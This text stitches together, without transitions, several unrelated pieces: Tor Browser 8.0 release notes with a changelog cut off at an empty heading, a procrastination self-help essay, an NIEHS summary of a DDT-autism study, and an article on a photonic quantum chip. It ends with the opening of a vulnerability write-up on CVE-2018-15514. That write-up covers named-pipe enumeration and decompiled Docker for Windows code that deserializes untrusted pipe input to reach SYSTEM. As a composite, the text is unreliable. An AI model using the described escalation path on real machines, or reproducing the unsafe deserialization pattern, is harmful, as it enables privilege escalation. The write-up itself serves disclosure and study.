For the past year, we have been collecting feedback on how we can make Tor Browser work better for you.

Tor Browser 8.0, our first stable release based on Firefox 60 ESR, is now available from the Tor Browser Project page and also from our distribution directory. This release is all about users first.

Tor Browser 8.0 comes with a series of user experience improvements that address a set of long-term Tor Browser issues you’ve told us about. To meet our users' needs, Tor Browser has a new user onboarding experience; an updated landing page that follows our styleguide; additional language support; and new behaviors for bridge fetching, displaying a circuit, and visiting .onion sites.

New User Onboarding

For the most part, using Tor is like using any other browser (and it is based on Firefox), but there are some usage differences and cool things happening behind the scenes that users should be aware of. Our new onboarding experience aims to better let you know about unique aspects of Tor Browser and how to maximize those for your best browsing experience.

Improved Bridge Fetching

For users where Tor is blocked, we have previously offered a handful of bridges in the browser to bypass censorship. But to receive additional bridges, you had to send an email or visit a website, which posed a set of problems. To simplify how you request bridges, we now have a new bridge configuration flow when you when you launch Tor. Now all you have to do is solve a captcha in Tor Launcher, and you’ll get a bridge IP. We hope this simplification will allow more people to bypass censorship and browse the internet freely and privately.

Better Language Support

Millions of people around the world use Tor, but not everyone has been able to use Tor in their language. In Tor Browser 8, we’ve added resources and support for nine previously unsupported languages: Catalan, Irish, Indonesian, Icelandic, Norwegian, Danish, Hebrew, Swedish, and Traditional Chinese.

Apart from those highlights, a number of other component and toolchains got an update for this major release. In particular, we now ship Tor 0.3.3.9 with OpenSSL 1.0.2p and Libevent 2.1.8. Moreover, we switched to the pure WebExtension version of NoScript (version 10.1.9.1) which we still need to provide the security slider functionality. Additionally, we start shipping 64bit builds for Windows users which should enhance Tor Browser stability compared to the 32bit bundles.

Providing this many improvements for our users could only be possible with collaboration between the Tor Browser team and Tor's UX team, Community team, Services Admin team, and our volunteers. We would like to thank everyone for working hard over the past year to bring all these new features to our users.

Known Issues

We already collected a number of unresolved bugs since Tor Browser 7.5.6 and tagged them with our ff60-esr keyword to keep them on our radar. The most important ones are listed below:

• WebGL is broken right now.
• We disable Stylo on macOS due to reproducibility issues we need to investigate and fix. This will likely not get fixed for Tor Browser 8, as we need some baking time on our nightly/alpha channel before we are sure there are no reproducibility/stability regressions. The tentative plan is to get it ready for Tor Browser 8.5.

Note: This release is signed with a new GPG subkey as the old one expired a couple of days ago. You might need to refresh your copy of the public part of the Tor Browser signing key before doing the verification. The fingerprint of the new subkey is 1107 75B5 D101 FB36 BC6C 911B EB77 4491 D9FF 06E2.

Give Feedback

This is only the beginning of our efforts to put users first. If you find a bug or have a suggestion for how we could improve this release, please let us know.

Changelog

The full changelog since Tor Browser 7.5.6 is:

• All platforms
  • Update Firefox to 60.2.0esr
  • Update Tor to 0.3.3.9
  • Update OpenSSL to 1.0.2p
  • Update Libevent to 2.1.8
  • Update Torbutton to 2.0.6
    • Bug 26960: Implement new about:tor start page
    • Bug 26961: Implement new user onboarding
    • Bug 26962: Circuit display onboarding
    • Bug 27301: Improve about:tor behavior and appearance
    • Bug 27214: Improve the onboarding text
    • Bug 26321: Move 'New Identity', 'New Circuit' to File, hamburger menus
    • Bug 26100: Adapt Torbutton to Firefox 60 ESR
    • Bug 26520: Fix sec slider/NoScript for TOR_SKIP_LAUNCH=1
    • Bug 27401: Start listening for NoScript before it loads
    • Bug 26430: New Torbutton icon
    • Bug 24309: Move circuit display to the identity popup
    • Bug 26884: Use Torbutton to provide security slider on mobile
    • Bug 26128: Adapt security slider to the WebExtensions version of NoScript
    • Bug 27276: Adapt to new NoScript messaging protocol
    • Bug 23247: Show security state of .onions
    • Bug 26129: Show our about:tor page on startup
    • Bug 26235: Hide new unusable items from help menu
    • Bug 26058: Remove workaround for hiding 'sign in to sync' button
    • Bug 26590: Use new svg.disabled pref in security slider
    • Bug 26655: Adjust color and size of onion button
    • Bug 26500: Reposition circuit display relay icon for RTL locales
    • Bug 26409: Remove spoofed locale implementation
    • Bug 26189: Remove content-policy.js
    • Bug 26490: Remove the security slider notification
    • Bug 25126: Make about:tor layout responsive
    • Bug 27097: Add text for Tor News signup widget
    • Bug 21245: Add da translation to Torbutton and keep track of it
    • Bug 27129+20628: Add locales ca, ga, id, is, nb, da, he, sv, and zh-TW
    • Translations update
  • Update Tor Launcher to 0.2.16.3
    • Bug 23136: Moat integration (fetch bridges for the user)
    • Bug 25750: Update Tor Launcher to make it compatible with Firefox 60 ESR
    • Bug 26985: Help button icons missing
    • Bug 25509: Improve the proxy help text
    • Bug 26466: Remove sv-SE from tracking for releases
    • Bug 27129+20628: Add locales ca, ga, id, is, nb, da, he, sv, and zh-TW
    • Translations update
  • Update HTTPS Everywhere to 2018.8.22
  • Update NoScript to 10.1.9.1
  • Update meek to 0.31
    • Bug 26477: Make meek extension compatible with ESR 60
  • Update obfs4proxy to v0.0.7 (bug 25356)
  • Bug 27082: Enable a limited UITour for user onboarding
  • Bug 26961: New user onboarding
  • Bug 26962: New feature onboarding
  • Bug 27403: The onboarding bubble is not always displayed
  • Bug 27283: Fix first-party isolation for UI tour
  • Bug 27213: Update about:tbupdate to new (about:tor) layout
  • Bug 14952+24553: Enable HTTP2 and AltSvc
    • Bug 25735: Tor Browser stalls while loading Facebook login page
  • Bug 17252: Enable TLS session identifiers with first-party isolation
  • Bug 26353: Prevent speculative connects that violate first-party isolation
  • Bug 26670: Make canvas permission prompt respect first-party isolation
  • Bug 24056: Use en-US strings in HTML forms if locale is spoofed to english
  • Bug 26456: HTTP .onion sites inherit previous page's certificate information
  • Bug 26561: .onion images are not displayed
  • Bug 26321: Move 'New Identity', 'New Circuit' to File, hamburger menus
  • Bug 26833: Backport Mozilla's bug 1473247
  • Bug 26628: Backport Mozilla's bug 1470156
  • Bug 26237: Clean up toolbar for ESR60-based Tor Browser
  • Bug 26519: Avoid Firefox icons in ESR60
  • Bug 26039: Load our preferences that modify extensions (fixup)
  • Bug 26515: Update Tor Browser blog post URLs
  • Bug 26216: Fix broken MAR file generation
  • Bug 26409: Remove spoofed locale implementation
  • Bug 25543: Rebase Tor Browser patches for ESR60
  • Bug 23247: Show security state of .onions
  • Bug 26039: Load our preferences that modify extensions
  • Bug 17965: Isolate HPKP and HSTS to URL bar domain
  • Bug 21787: Spoof en-US for date picker
  • Bug 21607: Disable WebVR for now until it is properly audited
  • Bug 21549: Disable wasm for now until it is properly audited
  • Bug 26614: Disable Web Authentication API until it is properly audited
  • Bug 27281: Enable Reader View mode again
  • Bug 26114: Don't expose navigator.mozAddonManager to websites
  • Bug 21850: Update about:tbupdate handling for e10s
  • Bug 26048: Fix potentially confusing "restart to update" message
  • Bug 27221: Purge startup cache if Tor Browser version changed
  • Bug 26049: Reduce delay for showing update prompt to 1 hour
  • Bug 26365: Add potential AltSvc support
  • Bug 9145: Fix broken hardware acceleration on Windows and enable it
  • Bug 26045: Add new MAR signing keys
  • Bug 25215: Revert bug 18619 (we are not disabling IndexedDB any longer)
  • Bug 19910: Rip out optimistic data socks handshake variant (#3875)
  • Bug 22564: Hide Firefox Sync
  • Bug 25090: Disable updater telemetry
  • Bug 26127: Make sure Torbutton and Tor Launcher are not treated as legacy extensions
  • Bug 13575: Disable randomised Firefox HTTP cache decay user tests
  • Bug 22548: Firefox downgrades VP9 videos to VP8 for some users
  • Bug 24995: Include git hash in tor --version
  • Bug 27268+27257+27262+26603 : Preferences clean-up
  • Bug 26073: Migrate general.useragent.locale to intl.locale.requested
  • Bug 27129+20628: Make Tor Browser available in ca, ga, id, is, nb, da, he, sv, and zh-TW
    • Bug 12927: Include Hebrew translation into Tor Browser
    • Bug 21245: Add danish (da) translation
• Windows
  • Bug 20636+10026: Create 64bit Tor Browser for Windows
    • Bug 26239+24197: Enable content sandboxing for 64bit Windows builds
    • Bug 26514: Fix intermittent updater failures on Win64 (Error 19)
    • Bug 26874: Fix UNC path restrictions failure in Tor Browser 8.0a9
    • Bug 12968: Enable HEASLR in Windows x86_64 builds
  • Bug 26381: Work around endless loop during page load and about:tor not loading
  • Bug 27411: Fix broken security slider and NoScript interaction on Windows
  • Bug 22581: Fix shutdown crash
  • Bug 25266: PT config should include full names of executable files
  • Bug 26304: Update zlib to version 1.2.11
  • Update tbb-windows-installer to 0.4
    • Bug 26355: Update tbb-windows-installer to check for Windows7+
  • Bug 26355: Require Windows7+ for updates to Tor Browser 8
• OS X
  • Bug 24136: After loading file:// URLs clicking on links is broken on OS X
  • Bug 24243: Tor Browser only renders HTML for local pages via file://
  • Bug 24263: Tor Browser does not run extension scripts if loaded via about:debugging
  • Bug 22794: Don't open AF_INET/AF_INET6 sockets when AF_LOCAL is configured
• Linux
  • Bug 22794: Don't open AF_INET/AF_INET6 sockets when AF_LOCAL is configured
  • Bug 25485: Unbreak Tor Browser on systems with newer libstdc++
  • Bug 20866: Fix OpenGL software rendering on systems with newer libstdc++
  • Bug 26951+18022: Fix execdesktop argument passing
  • Bug 24136: After loading file:// URLs clicking on links is broken on Linux
  • Bug 24243: Tor Browser only renders HTML for local pages via file://
  • Bug 24263: Tor Browser does not run extension scripts if loaded via about:debugging
  • Bug 20283: Tor Browser should run without a `/proc` filesystem.
  • Bug 26354: Set SSE2 support as minimal requirement for Tor Browser 8
• Build System
  • All
    • Bug 26362+26410: Use old MAR format for first ESR60-based stable
    • Bug 27020: RBM build fails with runc version 1.0.1
    • Bug 26949: Use GitHub repository for STIX
    • Bug 26773: Add --verbose to the ./mach build flag for firefox
    • Bug 26319: Don't package up Tor Browser in the `mach package` step
    • Bug 27178: add support for xz compression in mar files
    • Clean up
  • Windows
    • Bug 26203: Adapt tor-browser-build/tor-browser for Windows
    • Bug 26204: Bundle d3dcompiler_47.dll for Tor Browser 8
    • Bug 26205: Don't build the uninstaller for Windows during Firefox compilation
    • Bug 26206: Ship pthread related dll where needed
    • Bug 26396: Build libwinpthread reproducible
    • Bug 25837: Integrate fxc2 into our build setup for Windows builds
    • Bug 27152: Use mozilla/fxc2.git for the fxc2 repository
    • Bug 25894: Get a rust cross-compiler for Windows
    • Bug 25554: Bump mingw-w64 version for ESR 60
    • Bug 23561: Fix nsis builds for Windows 64
      • Bug 13469: Windows installer is missing many languages from NSIS file
    • Bug 23231: Remove our STL Wrappers workaround for Windows 64bit
    • Bug 26370: Don't copy msvcr100.dll and libssp-0.dll twice
    • Bug 26476: Work around Tor Browser crashes due to fix for bug 1467041
    • Bug 18287: Use SHA-2 signature for Tor Browser setup executables
    • Bug 25420: Update GCC to 6.4.0
    • Bug 16472: Update Binutils to 2.26.1
    • Bug 20302: Fix FTE compilation for Windows with GCC 6.4.0
    • Bug 25111: Don't compile Yasm on our own anymore for Windows Tor Browser
    • Bug 18691: Switch Windows builds from precise to jessie
  • OS X
    • Bug 24632: Update macOS toolchain for ESR 60
    • Bug 9711: Build our own cctools for macOS cross-compilation
    • Bug 25548: Update macOS SDK for Tor Browser builds to 10.11
    • Bug 26003: Clean up our mozconfig-osx-x86_64 file
    • Bug 26195: Use new cctools in our macosx-toolchain project
    • Bug 25975: Get a rust cross-compiler for macOS
    • Bug 26475: Disable Stylo to make macOS build reproducible
    • Bug 26489: Fix .app directory name in tools/dmg2mar
  • Linux

“Goddamn it, Nick! Stop being so productive.”

My buddy likes to say this in the morning when he walks into work at 8:30 am and sees me dutifully typing away on my computer. He knows that I’ve been in that same spot for at least the last two hours, being productive since 6:00 am, well before our actual day job begins at 9:00.

And it’s true—I’m a pretty productive guy. Before I start seeing clients at 9:00 am each morning, I’ve usually done several hours worth of work on my own projects and hobbies. In fact, I’m writing this story now on a Wednesday morning at 6:45 in my office before work.

And while most people see me being productive and looking like I’m getting a lot done, what they don’t see is how much I procrastinate. And let me tell you, I procrastinate A LOT!

Here’s how a typical “productive morning” looks for me where my goal is to, say, finish a draft of a new Medium article:

• Sit down at my desk and open up my computer.
• Procrastinate for 10 minutes.
• Start my pre-work ritual and write for 30 minutes.
• Procrastinate for 30 minutes.
• Get back into my article and write for an hour.
• Procrastinate for 45 minutes.
• Think about writing a little more. Decide it’s not worth it because I only have 15 minutes.
• Procrastinate for 14 minutes.

In three hours, I got maybe an hour and a half of writing done. Which means I only managed to use 50% of my time on that article. Hardly a glowing example of epic efficiency and productivity.

Or was it…?

Procrastination and Productivity are Not Opposites

“The most impressive people I know are all terrible procrastinators.” — Paul Graham in Good and Bad Procrastination

I struggle with the tendency to procrastinate at least as much as most people.

The difference is, I don’t fight it. In fact, I use my urge to procrastinate to be more productive.

Before I explain my own method of productive procrastination, let’s look at what procrastination looks like for most people:

• Think about working.
• Immediately feel the urge to procrastinate.
• Start beating themselves up with a bunch of negative self-talk for wanting to procrastinate (I’m such a procrastinator, why can’t you just stay focused?)
• Feel badly, including a bunch of negative emotions like shame and disappointment, on top of the already-strong urge to procrastinate.
• Procrastinate on something emotionally numbing.

Most people don’t procrastinate to avoid work; they procrastinate to avoid the negative feelings that come from misinterpreting the urge to procrastinate.

The initial urge to procrastinate is not the problem. It’s all the other negative emotion that we heap on ourselves by thinking of procrastination as a bad thing.

But let’s get back to me 😆

Here’s my morning writing routine again, but this time I’ve filled in the details of what the procrastination actually looks like:

• Sit down at my desk and open up my computer.
• Procrastinate for 10 minutes… By reading and commenting on Medium stories written by friends.
  
• Start my pre-work ritual and write for 30 minutes.
• Procrastinate for 30 minutes… By playing around with a new website design mockup in Sketch.
  
• Get back into my article and write for an hour.
• Procrastinate for 45 minutes… By reading a new book.
  
• Think about writing a little more. Decide it’s not worth it because I only have 15 minutes.
• Procrastinate for 14 minutes… By reading Hacker News or something else online.
  

Even though my procrastination activities aren’t directly helping me write my article, they are helping me be productive, at least in the long run.

• When I read and comment on friends’ Medium articles, I’m cultivating these relationships and increasing the chances that other people share my writing more widely when I publish.
• When I play around with a new website design, I’m working out lots of little decisions and preferences, so that when the time comes to re-do my website, it’s quick and easy because I’ve already done a lot of the work via countless 30-minute productive procrastination sessions in Sketch.
• When I read a new book, I’m gathering information for new articles and absorbing new ideas.
• Even reading Hacker News or some other blog post is potentially useful because it’s where I find a lot of the articles that I share in my weekly newsletter.

But even more importantly, by “rolling with” rather than fighting my urge to procrastinate, I avoid all the guilt and shame and truly counter-productive procrastination (binge-watching Netflix for half a day) that comes from viewing procrastination as something bad and a major character flaw.

By procrastinating about the right things in the right way, you’re never really procrastinating.

If you’d like to try your hand at productive procrastination, here are three practical strategies to get you started.

STRATEGY 1: Stop Being an A$$hole to Yourself

“I use procrastination as a guide from my inner self.” — Nassim Taleb

Most peoples’ problems with procrastination begin and end with being jerks… to themselves. Specifically, they talk a lot of trash to themselves in their own minds whenever they find themselves with the urge to procrastinate:

• God, why can’t I just focus?!
• There I go again, getting distracted.
• I wish I wasn’t such a procrastinator…
• If only I could work more consistently like Sandra.
• I’m never going to finish if I keep…

The problem with all this self-smack-talk is that it makes us feel badly about ourselves, typically in the form of guilt or shame.

Imagine if you had an evil twin who walked around by your side constantly whispering in your ear about how terrible of a person you were and how you’ll always suck and never make anything of yourself?

It would feel awful to have someone saying things like that to us 24/7, right? Even if we knew intellectually that it wasn’t true, it would start to get to us if we were constantly bombarded with it.

And yet, a lot of us do this to ourselves, often without even realizing it. People who struggle with procrastination tend to do it a lot.

If this sounds like you, the first step is to gain some awareness about how you talk to yourself when you feel the urge to procrastinate. Notice what your default inner voice says. Then write it down.

By getting that voice out onto paper and into the real world, you create distance on it and can begin to see it for what it is: Not some intrinsic part of your personality, but a mental habit.

Maybe it’s something that’s been reinforced over years or even decades, but it’s also something that can be undone with some awareness and practice.

Once you’ve written down what your mind tends to say, for each thought, come up with a handful of alternative thoughts.

For example, suppose I notice that whenever I feel the urge to procrastinate, the first thought that runs through my mind is: Damn, I wish I wasn’t such a procrastinator.

Some alternative thoughts might be:

• I do tend to procrastinate a lot with my writing, but I’m really disciplined about lots of other things like going to the gym and meal prepping.
• I guess I haven’t always struggled so much with procrastination It’s only been since starting my new job.
• Just because I feel the urge to procrastinate doesn’t mean that’s who I am or that I can’t also be productive.

Takeaway

Most forms of truly counter-productive procrastination (e.g. binge-watching Netflix or YouTube videos for 3 hours) are a result of us trying to escape from or avoid the shame that arises from our own overly-negative self-talk. If we can identify and begin to modify this self-talk, we’ll feel less shame and negative emotion and therefore be less likely to engage in such mindless and unproductive forms of procrastination.

STRATEGY 2: Procrastinate Consistently

“You should never fight the tendency to procrastinate.” — Marc Andreessen in The Pmarca Guide to Personal Productivity

When I allow myself to regularly procrastinate in small ways, I almost never procrastinate in big ways.

I suppose there are some people out there who are capable of massive amounts of focused concentration on a single task, day in and day out. But I’m certainly not that type of person, nor do I want to be.

I’m interested in and enjoy lots of things. And unsurprisingly, my brain gets a little tired of focusing on one thing for too long and wants to mix it up.

In my experience, when you judiciously indulge this tendency from time to time, allowing your natural curiosity to wander where it will, you avoid the major need to procrastinate in a big way.

In other words, look at procrastination not as an inherent character flaw but an expression of a natural and good human desire for variety and curiosity.

And if you make time for this natural curiosity regularly and in small doses, rarely does it get pent up to the point that it results in one of those all-day Netflix binges that leave you in a comma, drooling off the side of your couch with Dorito crumbs all over your shirt.

Takeaway

Re-frame procrastination as a natural desire for variety and curiosity in your life. If you give this natural curiosity regular outlets throughout your days and weeks, it won’t need to blow up into major procrastination.

STRATEGY 3: Cultivate Interests that Synergize with Your Work

“Virtually all procrastinators have excellent self-deceptive skills.” — John Perry in Structured Procrastination

All great procrastinators have one thing in common: They procrastinate with productive things.

Like I explained above, one of my favorite ways to procrastinate is by reading. When I’m tired of writing and need a break/distraction, I always have a handful of books close by that I’m interested in and find enjoyable.

Reading isn’t a direct and immediate productivity benefit in terms of the specific article I’m working on. But it is a long-term productivity benefit because it exposes me to new ideas. And if you’ve ever done any consistent writing, you know how important it is to have a steady stream of new, interesting ideas to write about.

In other words, reading is a great way to procrastinate on my writing because they have a synergistic relationship. Not only does reading give me a break from my writing, it also improves my writing and makes it easier to keep writing by steadily supplying new ideas.

One of my favorite writers on procrastination, Nilz Salzgeber, has another great example of this principle (procrastinating on writing via snorkeling) in his own piece on productive procrastination.

If you want to get started with productive procrastination, it’s important to cultivate a set of activities that are enjoyable, interesting, and provide healthy distractions and relief from your primary work. But these activities should also contribute to or support your long-term productivity somehow, even if it’s in a very indirect way and over a long time period.

Takeaway

By cultivating hobbies and interests that are at least indirectly supportive of your primary work, anytime you choose to procrastinate you’ll be engaging in productive procrastination.

Wrapping Up

The core idea behind productive procrastination is that we’d all be a lot happier and more productive if we thought a little differently about what procrastination is and what it means.

Rather than viewing procrastination as a character flaw and something to be squashed, we ought to look at it as a natural desire we all have to diversify our work and interests.

When we can re-frame it this way, it becomes much easier to harness procrastination and channel it to productive ends.

What to Read Next

If you enjoyed this article, you might also like:

Can You Do Me a Favor?

If you enjoyed this article, please consider sharing!

Pregnant women with high levels of DDE, a metabolite of the insecticide DDT, in their blood are more likely to have children who develop autism, NIEHS grantees reported in the American Journal of Psychiatry. In contrast, they found no association between mothers’ exposure to polychlorinated biphenyls (PCBs) and autism development in their children. Lead author Alan Brown, M.D., is from the Columbia University Medical Center and the New York State Psychiatric Institute.

The study is the first to use maternal biomarkers during pregnancy to connect exposure to an insecticide with the risk for a clinical diagnosis of autism,” said Cindy Lawler, Ph.D., chief of the Genes, Environment, and Health Branch at NIEHS. “Along with genetic susceptibility, our environment is important in the risk for developing autism.”

Chemicals persist in the body

According to estimates from the U.S. Centers for Disease Control and Prevention (CDC), 1 in 59 children in the U.S. will develop autism. Researchers have begun to untangle the link between genetics and autism, but the link between environmental factors and autism is less clear.

Although banned for more than 30 years in many countries due to suspected health effects, chemicals such as DDT and PCBs still exist in the environment due to their slow breakdown and the way they accumulate in plants and animals in the food chain. According to the CDC, most of the U.S. population has detectable levels of DDE.

"We think of these chemicals in the past tense, relegated to a long-gone era of dangerous 20th Century toxins," Brown said in a press release from the university. "Unfortunately, they are still present in the environment and are in our blood and tissues. In pregnant women, they are passed along to the developing fetus."

A wealth of data provides answers

With funding from NIEHS, an international team of researchers wanted to see if and how exposure to certain chemicals might affect childhood development. They used national health registry data and blood samples available from the Finnish Prenatal Study of Autism and Autism Spectrum Disorders (FIPS-A).

The team identified 778 cases of autism among children born during an 18-year period to women who participated in FIPS-A. Those mother-child pairs were matched — based on place and date of birth, sex, and residence — to mother-child pairs without autism, and blood-serum samples were analyzed for PCB and DDE levels.

Mothers with the highest levels of DDE in their blood were one-third more likely than women with lower DDE levels to have children who developed childhood autism. When the investigators looked at the subgroup of individuals who had both autism and intellectual disability, the risk from high levels of DDE was more than doubled. However, the researchers found no link between maternal blood levels of PCBs and autism.

“This is a very strong study design,” Lawler said. “The sample size was large, and the investigators were able to avoid biases that can occur in other studies, when children are enrolled after an autism diagnosis and researchers have to rely on indirect methods to estimate exposures during pregnancy. In this case, access to early- and mid-pregnancy biospecimens meant that they were able to measure the environmental chemicals collected prospectively in these mothers.”

Finland has a national health delivery system, so the researchers were able to avoid the problem of the people who enroll in a study being somehow different than the general population, she explained. “The finding has to be replicated,” she said, “but for a single study, this is solid.”

Next steps — unraveling mechanisms

As with many studies, these findings put forth more questions. For example, the mechanism for how DDT affects the risk of autism is still unknown. The study authors suggest two possibilities.

1. DDT has been linked with low birth weight and premature birth, which are known risk factors for autism.
2. DDT is known to bind to proteins in the body called androgen receptors, which allow cells to respond to hormones. Through this, DDT might alter how sex hormones affect brain development.

Lawler reflected on how these findings can drive public health action. “When we find that environmental risk factors, such as DDT exposure, can impact autism risk, this can translate into how to avoid that exposure or reduce it,” she said. “Nongenetic risk factors, like chemical exposures, can be preventable, so that puts us in a different mindset of how to manage risk.”

Citation: Brown AS, Cheslack-Postava K, Rantakokko P, Kiviranta H, Hinkka-Yli-Salomaki S, McKeague IW, Surcel H, Sourander A. 2018. Association of maternal insecticide levels with autism in offspring from a national birth cohort. Am J Psychiatry; doi:10.1176/appi.ajp.2018.17101129 [online 16 August].

(Sheena Scruggs, Ph.D., is a Digital Outreach Coordinator in the NIEHS Office of Communications and Public Liaison.)

There comes a moment in every physicist's life when they think the unthinkable: I wish I were an engineer. I suspect this thought crossed the minds of the 14-odd physicists involved in creating a key demonstration of the scalability of quantum computing using light.

At the moment, if you had to bet on the technology most likely to win the quantum computing race, most people would put their chips on a spread ofsuperconducting rings. But I’d put the house and kids on light. Why? Because lasers make everything better. More seriously, quantum computing architectures based on superconducting devices have made remarkable progress in the last five to ten years. By contrast, progress on the light front has been ominously slow. But it should be easier to work with light-based qubits if we can ever get them off the ground.

Why I love photons

Photons, as far as I’m concerned, still make the best quantum bits (qubits). This is because photons mostly pass through the world unhindered. A photon, in a super-special quantum state, can go from air to an optical fiber to air, through a silicon chip, back into air, and into a fiber again, all without destroying its quantum state. About all you need to ensure is that your photon detector is in the dark so that only the qubit photons hit it.

Superconducting qubits are made up of electrons, which are sensitive to everything. It takes real experimental skill and good engineering to ensure that superconducting qubits maintain their quantum state.

You should be wondering why, if light is so good, light-based quantum computers lag so far behind. It is for exactly the same reason: photons don’t notice each other, but electrons do. Imagine you want to switch the state of one qubit based on the state of another qubit. For electrons, that’s simple because they have an electric and magnetic field through which they can manipulate each other. Photons, however, just pass right through each other without noticing. The simple way to implement quantum operations is actually very, very hard using photons.

Instead, you have to use multiple combinations of linear operators. What is the difference? Put it like this: in a nonlinear operation, two photons might collide to create a single photon, or a single photon might split to create two photons. But, in a linear operation, the number of photons is preserved, and only their paths are modified. 

To perform a two-qubit operation you need a minimum of one gate and three qubits—two that are being operated on, and one controlling the operation. To perform the same operation using only linear operations (as required for photons) requires four qubits and four gates. The complexity grows horribly quickly.

This is where the shift from physics to engineering is required. To implement a single gate is complex but doable. But, what about implementing all possible gates for, say, two qubits? That requires the design of a custom integrated optical chip. This is where the engineers come in.

The chip that the researchers produced is quite remarkable. It takes in a single laser light source and, from there, generates pairs of photonic qubits. The qubits then pass through a single gate that consists of a maze of interferometers (the linear operation used to construct the gates). Each waveguide has a small heating element attached that allows the researchers to control the exact distance the photons travel between and in each interferometer. This control determines the path that photons take through the maze. Or more specifically, the control, combined with the quantum state of the photon, determines the path through the maze.

The researchers demonstrated this by implementing 98 different two-qubit gates on the same hardware. And, along with each, they performed a full set of measurements (about 1,000 measurements per gate). The gates are about as reliable as any others you will find in the quantum computing world, which is to say that operations complete successfully around 93 percent of the time. For comparison, ion-based quantum computers are at 95 to 99 percent and superconducting quantum computers are around 90 to 95 percent.

To show that the chip was capable of more than just a single operation, the researchers showed that you can run an optimization algorithm on it.

Two-bit heaven

This is still just two qubits, which is nothing compared to superconducting quantum computers, which are now in the 20-qubit range. So, why am I excited? The point is that this paper shows that many of the big problems have been overcome. The researchers showed that you can design, fabricate, and control a chip with the precision required for programmable quantum computing. There is not much to stop the design of the gate from being scaled up to more elaborate circuits that could run bigger programs (if the chip had enough qubits and they could be detected).

Therein lie a couple of potential stumbling points. The photon detectors were not on the chip. Instead the light was piped out to external detectors. For two qubits (just two external detectors), that is feasible. For 100 qubits, that is probably not going to work. Maybe two chips—one for computation and one for detection—are going to have to be glued together. 

Likewise, the light source is going to be difficult. The researchers' production process for entangled photons is a random process. Each laser pulse might or might not generate entangled photons. In the case of this chip, which has just two computational qubits, there are four independent locations where these photons are generated. For a computation to take place, two locations have to produce a pair of photons independently. This takes place for about a quarter of the laser pulses.

To increase the number of entangled photons, you need to generate them simultaneously at multiple sites. The chances of that happening are not great; a 100-qubit computer would never be expected to work. There are, I should say, many other ways to produce the required photons. And many of these are deterministic: you push a button and get a photon. But, the big question is if they can be integrated into the chip technology developed here. 

In any case, I’m pretty excited by developments on the computation side. And very wary of the road ahead for generating the required photons and detecting the result of the computation.

Nature Photonics, 2018, DOI: 10.1038/s41566-018-0236-y. (About DOIs)

I have been continuing my journey of searching for windows breakout vulnerabilities in popular applications and one that I discovered in March I found interesting enough to share. Whilst kernel vulnerabilities are fun to discover, there are many core windows and third party applications that are fundamentally broken in regards to logic and makes for a lucrative means to gain a SYSTEM shell without having to bypass the several memory mitigations that stand in the way.

TL;DR

I walk through discovering and exploiting CVE-2018-15514 which is a .net deserialization vulnerability in Docker for Windows. Docker at first denied a vulnerability existed at all, but later patched it on July 19th. After further discussions, they assigned CVE-2018-15514 on the 18th August.

Introduction

Docker for Windows comes as a 64bit installation package for Windows 10 and above. I quickly spun up a Windows 10 64bit virtual machine for testing purposes. Taken directly from the docker site:

An integrated, easy-to-deploy development environment for building, debugging and testing Docker apps on a Windows PC. Docker for Windows is a native Windows app deeply integrated with Hyper-V virtualization, networking and file system, making it the fastest and most reliable Docker environment for Windows

By default, Docker for Windows installs a client and server application.

Discovering the Vulnerability

After browsing the currently running processes with Process Explorer from SysInternals, I found a process called com.docker.service. This process had created some NamedPipes called dockerBackend and dockerLogs and is compiled with .net.

Searching for NamedPipes

Permission Check

Once I had found a potential attack surface with NamedPipes, it was important that I checked what permissions were set on the NamedPipe to ensure that low privileged users could access it. Any vulnerabilities in this interface could mean that a low privileged attacker can escalate to SYSTEM level.

To do this check, I used Pipe Secuirty Viewer by Craig Peacock from Beyond Logic. Whilst this tool is old, it gets the job done (however I am open for suggestions on better tools/methods for doing these checks).

After simply running the tool, we can get a list of NamedPipes that are running on the system. By specifying our \\NamedPipe\dockerBackend pipe, we can see the allowed user and groups and what permissions are set for each.

Showing the users & groups with access to the NamedPipe

One of the users I noticed is the docker-users group, which is a windows group that is created upon installation of the Docker for Windows. The TL;DR is that this group is used for accounts that want to access containers. This looked interesting to me, so I decided to check out their permissions. As it turns out, their pretty relaxed about things.

Permissions set for the docker-users group on the dockerBackend NamedPipe

After a quick google search, I found it’s common practice for Administrators to just add a user into that group with no official documentation from Docker was disputing this.

Unofficial documentation recommending Administrators to add users to the docker-users group

Finding Valid Data

At this point I needed to find some valid data to send to this endpoint. I could have just starting diving into the source code at this point, but to be honest, at the time I had assumed that Docker for Windows was going to do some complex parsing through this NamedPipe. There are not many tools to sniff NamedPipe data, but one that I found was called I/O Ninja which has an module for this exact purpose.

Captured NamedPipe data in I/O Ninja

I set a filter for dockerBackend and proceeded to run the client, which dumped the following output. Circled in purple, is the size of the buffer, followed by a .net serialized object.

The vulnerability

So at this point, we can dive into the decompiled source code to confirm our suspicions. I am using dnSpy here, so I load up the C:\Program Files\Docker\Docker\com.docker.service binary. A quick check reveals our vulnerable code is actually inside of the Docker.core.dll binary within the Docker.Core.Pipe namespace.

Within this namespace, we can see a class defined as NamedPipeServer and the first method that is executed is Run

publicvoidRun(){this._cts=newCancellationTokenSource();CancellationTokentoken=this._cts.Token;this._currentRunningTask=this.DoRunAsync(token);}

This Run calls the DoRunAsync method.

privateasyncTaskDoRunAsync(CancellationTokentoken){while(!token.IsCancellationRequested){NamedPipeServer.<>c__DisplayClass10_0<>c__DisplayClass10_=newNamedPipeServer.<>c__DisplayClass10_0();<>c__DisplayClass10_.<>4__this=this;try{<>c__DisplayClass10_.pipeServer=PipeHelper.NewServerStream(this._pipeName,this._usersGroup.Sid);}catch(Exceptione){this._logger.Error(string.Format("Unable to create a pipe: {0} {1}",e.Message,e.StackTrace));continue;}try{await<>c__DisplayClass10_.pipeServer.WaitForConnectionAsync(token);}catch(OperationCanceledException){}catch(Exceptione2){this._logger.Error(string.Format("Unable to connect: {0} {1}",e2.Message,e2.StackTrace));continue;}Task.Run(()=><>c__DisplayClass10_.<>4__this.HandleRequestAsync(<>c__DisplayClass10_.pipeServer));<>c__DisplayClass10_=null;}}

Then the DoRunAsync method calls the HandleRequestAsync method.

privateasyncTaskHandleRequestAsync(NamedPipeServerStreampipeServer){try{using(NamedPipeServerStreamserver=pipeServer){byte[]sizeBytes=newbyte[4];awaitserver.ReadAsync(sizeBytes,0,sizeBytes.Length);intsize=BitConverter.ToInt32(sizeBytes,0);byte[]requestBytes=newbyte[size];awaitserver.ReadAsync(requestBytes,0,requestBytes.Length);BinaryFormatterbf=newBinaryFormatter();PipeRequestrequest=(PipeRequest)bf.Deserialize(newMemoryStream(requestBytes,0,requestBytes.Length,false));

